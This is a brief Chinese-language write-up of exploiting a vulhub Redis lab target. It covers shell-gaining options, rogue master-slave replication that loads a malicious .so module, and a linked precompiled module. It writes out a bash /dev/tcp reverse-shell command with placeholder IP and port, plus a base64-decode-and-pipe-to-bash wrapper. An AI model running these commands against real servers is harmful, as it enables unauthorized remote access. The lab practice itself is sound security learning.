靶场
通过vulhub搭建靶场
靶场搭建不再赘述直接docker-compose up -d
启动!
可以看到靶场已经启动了
主要拿权限的就几个方法:
写入webshell(没有web服务,就跳过)
写入公钥(这个靶场可以修改配置写公钥,但是它没有ssh服务)
写入定时任务(这容器也没有定时任务)
使用提供的脚本进行命令执行
主从复制
1、使用脚本进行命令执行(利用主从复制,加载恶意.so文件执行命令)
使用靶场提供的python脚本进行执行,需要自行编译文件。自行尝试后编译一堆报错直接找了一个编译好的文件:https://github.com/xj-test-user/redis-rogue-getshell
直接在本机执行python脚本
这里再想能不能利用该脚本进行反弹shell,尝试了基础的nc反弹命令bash -i >& /dev/tcp/[IP]/[Port] 0>&1
发现一直没有反应。
然后又尝试对命令进行base64然后执行,成功反弹shell。
base64后的命令:
(echo '[base64后的命令]' | base64 -d | bash)